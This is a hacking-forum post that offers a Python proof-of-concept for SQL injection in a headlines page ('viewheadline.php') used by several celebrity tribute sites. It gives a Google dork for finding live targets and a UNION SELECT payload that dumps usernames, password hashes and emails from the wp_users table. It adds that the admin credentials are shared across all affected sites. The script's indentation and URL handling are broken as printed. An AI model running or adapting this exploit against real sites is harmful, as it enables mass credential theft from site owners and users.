PoC - PHP GroupWare Headlines Admin SQLi
Here's a PoC for some SQL injection which affects a bunch of sites dedicated to dead celebrities, some examples include:
  • Malcolm X
  • Marylin Monroe
  • Andre The Giant
  • Jean Harlow
  • Ella Fitzgerald
and more Smile

for a full list of sites the following google dork will work: inurl:viewheadline.php?id=

from sys import argv, exit  
from urllib import urlopen  
from re import findall                  
if len(argv) < 2:  
exit('Usage: python file.py http://vulnsite.com/path/')  
print "\n// P0ISON.ORG // POC // 17/1/2015 // \n\n"          
payload = 'viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat(user_login,0x3a,user_pass,0x3a,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from wp_users--+'        
arg = argv[1]  
if arg[0:7] != "http://":  
url = "http://" + str(arg)                                                                                                                                                        
url = arg  
data = urlopen(url + str(payload)).read()  
matches = findall(r"<span class=\"newstitle\">(.*?)</span>", data)  
for match in matches:  
x = match.split(":")  
print "User: " + str(x[0]) + " | Password: " + str(x[1]) + " | E-mail: " + str(x[2]) + "\n"

Working example:


something funny to note is that the admin hash and usernames of admin accounts is the SAME for all affected websites. In addition to this, the column count is static so the PoC will work the same for all affected sites without need for modifications to the source or a method for determining the column count.

Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] PHP CGI exploit Insider 0 555 06-16-2020, 11:34 AM
Last Post: Insider
  [SQLi] Blind SQLi queries Insider 0 564 06-16-2020, 04:00 AM
Last Post: Insider
  POC for XML-PRC ? h3x0r 1 5,986 05-20-2019, 01:11 PM
Last Post: Insider
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,828 04-24-2019, 08:47 PM
Last Post: thunder